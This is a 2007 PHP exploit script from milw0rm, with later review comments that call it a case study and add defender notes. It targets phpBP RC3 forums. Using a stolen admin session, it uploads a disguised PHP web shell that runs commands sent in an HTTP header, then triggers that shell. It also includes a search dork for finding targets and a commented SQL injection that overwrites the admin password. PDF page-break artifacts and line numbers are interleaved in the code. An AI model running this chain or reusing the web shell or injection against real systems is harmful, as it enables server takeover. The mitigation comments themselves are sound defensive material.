<?
//**************************************************************
//Kacper & str0ke Settings
// NOTE(review): 2007 proof-of-concept against a long-unmaintained forum package,
// kept as a case study of an authenticated upload-to-RCE chain (an admin session
// is required, see below). The defender lessons are server-side extension
// allowlisting on uploads and storing uploads where the web server never
// executes scripts.
$exploit_name = "phpBP <= RC3 (2.204) (sql/cmd) Remote Code Execution Exploit";
$script_name = "phpBP RC3 (2.204)";
$script_site = "http://www.phpbp.com/";
// Search-engine "dork": the Polish copyright footer printed by the target product.
$dork = ’Silnik strony jest chroniony prawami autorskimi PHP BP Team’;
//to work exploit you need admin session
//**************************************************************
// Banner: one multi-line string literal interpolating the settings above.
print ’
::::::::: :::::::::: ::: ::: ::::::::::: :::
:+: :+: :+:            :+: :+: :+: :+:
+:+ +:+ +:+              +:+ +:+ +:+ +:+
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
+#+ +#+ +#+                 +#+ +#+          +#+ +#+
#+# #+# #+#                 #+#+#+#          #+# #+#
######### ########## ### ########### ##########
::::::::::: :::::::::: ::: :::: ::::
    :+: :+:             :+: :+: +:+:+: :+:+:+
    +:+ +:+              +:+ +:+ +:+ +:+:+ +:+
    +#+ +#++:++# +#++:++#++: +#+ +:+ +#+
    +#+ +#+              +#+ +#+ +#+             +#+
    #+# #+#              #+# #+# #+#            #+#
    ### ########## ### ### ###                     ###

  − − [DEVIL TEAM THE BEST POLISH TEAM] − −


[Exploit name: ’.$exploit_name.’
[Script name: ’.$script_name.’
[Script site: ’.$script_site.’
dork: ’.$dork.’

Find by: Kacper (a.k.a Rahim)
Blog: http://kacper.bblog.pl/

DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam
DEVIL TEAM HOME: http://www.rahim.webd.pl/

Contact: kacper1964@yahoo.pl

(c)od3d by Kacper
−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
Greetings DragonHeart and all DEVIL TEAM Patriots :)
− Leito & Leon | friend str0ke ;)

pepi, D0han, d3m0n, D3m0n (ziom z Niemiec :P)
dn0de, DUREK5, fdj, konsol, mass, michalind, mIvus, nukedclx, QunZ,
RebeL, SkD, Adam, drzewko, Leito, LEON, TomZen, dub1osu, ghost, WRB

and

Dr Max Virus
TamTurk,
hackersecurity.org
and all exploit publishers
−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
          Greetings for 4ll Fusi0n Group members ;−)
          and all members of hacker.com.pl ;)
−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−

     Kacper Hacking & Security Blog: http://kacper.bblog.pl/
’;
/*
Exploit upload evil script when admin add new banner in portal.

i Find some errors in forum. Enter in comment forum:

*/
// Author's side note: a commented-out SQL string for a separate injection point in
// the forum's comment form. Left as documentation only; the mitigation on the
// application side is parameterised queries for the comment handling.
//fajny’;UPDATE/**/‘22_users‘/**/SET/**/‘pass‘/**/=/**/’6a8f25e5b30777a0435c22fe36f45e3c’,‘buddies‘/**/=/**/NULL,‘forum_subscribed‘/**/=/**/NULL,‘forum_subscribed_clicked‘/**/=/**/NULL,‘forum_unsubscribe‘/**/=/**/NULL/**/WHERE/**/‘id‘/**/=/**/’1’/**/LIMIT/**/1;
/*
then you can insert SQL code :)
*/
// Usage guard: host, path, admin session id and a command are all required;
// the options (-p port, -P proxy) are parsed further down.
if ($argc<5) {
print_r(’
−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
Usage: php ’.$argv[0].’ host path admin_session cmd OPTIONS
host:    target server (ip/hostname)
path:     phpBP Forum path
admin_session: admin session id
cmd:       a shell command (ls −la)
Options:
 −p[port]: specify a port other than 80
 −P[ip:port]: specify a proxy
Example:
php ’.$argv[0].’ 2.2.2.2 /phpBP/ d6c6cae3dfea20a0a5358fc9baff47be ls −la −P1.1.1.1:80
php ’.$argv[0].’ 2.2.2.2 /phpBP/ d6c6cae3dfea20a0a5358fc9baff47be ls −la
−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
’);
die;
}
// Silence all PHP diagnostics; connection failures are echoed by sendpacket() itself.
error_reporting(0);
// No wall-clock limit for the CLI run; 5 s timeout on the sockets opened below.
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
  94    function quick_dump($string)
  95    {
  96       $result=’’;$exa=’’;$cont=0;
  97       for ($i=0; $i<=strlen($string)−1; $i++)
  98       {
  99         if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
  100        {$result.=" .";}
Kacper                                                                                                              01/18/2007
                          phpBP RC3 2.204 sqlcmd Remote Code Execution Exploit                     Page 3/5
  101        else
  102        {$result.=" ".$string[$i];}
  103        if (strlen(dechex(ord($string[$i])))==2)
  104        {$exa.=" ".dechex(ord($string[$i]));}
  105        else
  106        {$exa.=" 0".dechex(ord($string[$i]));}
  107        $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  108      }
  109     return $exa."\r\n".$result;
  110   }
  111   $proxy_regex = ’(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)’;
function sendpacket($packet)
{
   // Sends one raw HTTP request and leaves the whole response in global $html.
   // Connection parameters come from globals set by the argument parsing below:
   // $host, $port and an optional $proxy ("ip:port", checked against
   // $proxy_regex). Any connection failure prints a message and exits.
   global $proxy, $host, $port, $html, $proxy_regex;
   if ($proxy==’’) {
      // Direct connection; the host name is resolved before connecting.
      $ock=fsockopen(gethostbyname($host),$port);
      if (!$ock) {
        echo ’No response from ’.$host.’:’.$port; die;
      }
   }
   else {
      $c = preg_match($proxy_regex,$proxy);
      if (!$c) {
        echo ’Not a valid proxy...’;die;
      }
      $parts=explode(’:’,$proxy);
      echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
      $ock=fsockopen($parts[0],$parts[1]);
      if (!$ock) {
        echo ’No response from proxy...’;die;
      }
   }
   fputs($ock,$packet);
   if ($proxy==’’) {
      // Direct: read line by line until the peer closes the socket (every
      // request built in this script carries "Connection: Close").
      $html=’’;
      while (!feof($ock)) {
        $html.=fgets($ock);
      }
   }
   else {
      // Via proxy: read one byte at a time. NOTE(review): the two conditions are
      // joined with "or", so if the proxy closes the socket before a CRLFCRLF
      // sequence has been seen, feof() is true but the second test keeps the
      // loop alive and fread() returns "" forever. eregi() is also a POSIX-regex
      // function that no longer exists in PHP 7 and later.
      $html=’’;
      while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
        $html.=fread($ock,1);
      }
   }
   fclose($ock);
}
  148   function make_seed()
  149   {
  150       list($usec, $sec) = explode(’ ’, microtime());
  151       return (float) $sec + ((float) $usec * 100000);
  152   }
// ---- Command-line handling ----
// Positional arguments: target host, forum path, admin session id. Everything
// from argv[4] onwards is appended to the command, except arguments starting
// with -p (port) or -P (proxy), which are consumed as options.
$host=$argv[1];
$path=$argv[2];
$adsess=$argv[3];
$cmd="";
$port=80;
$proxy="";
for ($i=4; $i<$argc; $i++){
// The first two characters decide whether this argument is an option.
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"−p") and ($temp<>"−P")) {$cmd.=" ".$argv[$i];}
if ($temp=="−p")
{
   $port=str_replace("−p","",$argv[$i]);
}
if ($temp=="−P")
{
   $proxy=str_replace("−P","",$argv[$i]);
}
}
// Through a proxy the request line needs an absolute URL; direct requests use
// the bare path.
if ($proxy==’’) {$p=$path;} else {$p=’http://’.$host.’:’.$port.$path;}
echo "Connected...\n";
// ---- Multipart body for the admin "add banner" form ----
// Hand-built multipart/form-data with boundary "H4ck". The part that matters is
// "image_form": a file upload whose name ends in ".php" and whose content is a
// small PHP script that runs a command taken from a request header.
// Defender view: this is the textbook upload-to-RCE chain. Mitigations are a
// server-side extension allowlist that is not fooled by a double extension such
// as "d.jpg.vil.gif.php", storing uploads outside the web root or in a
// directory with script execution disabled, and alerting on new .php files
// appearing under the upload directory.
$data ="−−H4ck\r\n";
$data.="Content−Disposition: form−data; name=\"url\";\r\n\r\n";
$data.="http://kacper.bblog.pl/\r\n";
$data ="−−H4ck\r\n";
$data.="Content−Disposition: form−data; name=\"limit\";\r\n\r\n";
$data.="0\r\n";
$data ="−−H4ck\r\n";
$data.="Content−Disposition: form−data; name=\"image\";\r\n\r\n";
$data.="1\r\n";
$data ="−−H4ck\r\n";
$data.="Content−Disposition: form−data; name=\"form\";\r\n\r\n";
$data.="1\r\n";
$data ="−−H4ck\r\n";
$data.="Content−Disposition: form−data; name=\"image_form\" filename=\"d.jpg.vil.gif.php\";\r\n\r\n";
$data.="Content−Type: text/plain\r\n";
$data.="Content−Transfer−Encoding: binary\r\n";
$data.=’<?php ob_clean();//Ruchomy zamek Hauru ;−)echo"...Hacker..Kacper..Made..in..Poland!!...DEVIL.TEAM..the..best..polish..team..Greetz...";echo"...Go To DEVIL
      TEAM IRC: irc.milw0rm.com:6667 #devilteam";echo"...DEVIL TEAM SITE: http://www.rahim.webd.pl/";ini_set("max_execution_time",0);echo "Hauru";passthru($_SER
      VER[HTTP_HAURU]);die;?>\r\n’;
$data ="−−H4ck\r\n";
$data.="Content−Disposition: form−data; name=\"image_http\";\r\n\r\n";
$data.="http://\r\n";
$data ="−−H4ck\r\n";
$data.="Content−Disposition: form−data; name=\"swf\";\r\n\r\n";
$data.="0\r\n";
$data ="−−H4ck\r\n";
$data.="Content−Disposition: form−data; name=\"alt\";\r\n\r\n";
$data.="0\r\n";
$data ="−−H4ck\r\n";
$data.="Content−Disposition: form−data; name=\"submit\";\r\n\r\n";
$data.="Add\r\n";
$data.="−−H4ck−−\r\n";
echo "wait now insert evil code...\n";
// Step 1: POST the multipart body to the banner-add action. The only
// authentication is the admin's session cookie (phpBP2), which is why the
// script needs a valid admin session id as input.
$packet ="POST ".$p."index.php?module=admin&action=banners&cmd=add HTTP/1.0\r\n";
$packet.="Cookie: phpBP2=".$adsess.";\r\n";
$packet.="Content−Type: multipart/form−data; boundary=−−H4ck\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content−Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacket($packet);
// Step 2: fetch the banner list and scrape the id the upload was stored under
// (upload/banners/<id>.php) out of the HTML. Any change to the template markup
// breaks this scraping, in which case the script reports a failed upload.
$packet ="GET ".$p."index.php?module=admin&action=banners HTTP/1.0\r\n";
$packet.="Cookie: phpBP2=".$adsess.";\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacket($packet);
$temp=explode(’<TD CLASS="row_1" ALIGN="CENTER"><A HREF="upload/banners/’,$html);
$temp2=explode(’.php" TARGET="_blank">’,$temp[1]);
$uploadid=trim($temp2[0]);
if ($uploadid) {echo "Step 1\n";
echo "Upload id: ".$uploadid."\n";
// Step 3: request the uploaded script directly; the command travels in a custom
// "HAURU" request header that the dropped script reads from $_SERVER.
// Detection: a request for a .php file under upload/ is a strong signal in
// access logs, a reverse proxy or WAF can flag unknown custom request headers,
// and file-integrity monitoring on the banner directory catches the write.
$packet ="GET ".$p."upload/banners/".$uploadid.".php HTTP/1.0\r\n";
$packet.="HAURU: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacket($packet);
sleep(1);
}else {
echo "exploit failed... can’t upload script :/\n";
echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n";
die("\n\nClose Connection");
}
// The dropped script prints the marker "Hauru" right before the command output,
// so everything after the marker in the response is echoed as the result.
if (strstr($html,"Hauru"))
{
$temp=explode("Hauru",$html);
die($temp[1]);
}
?>
  240
  241   # milw0rm.com [2007−01−18]



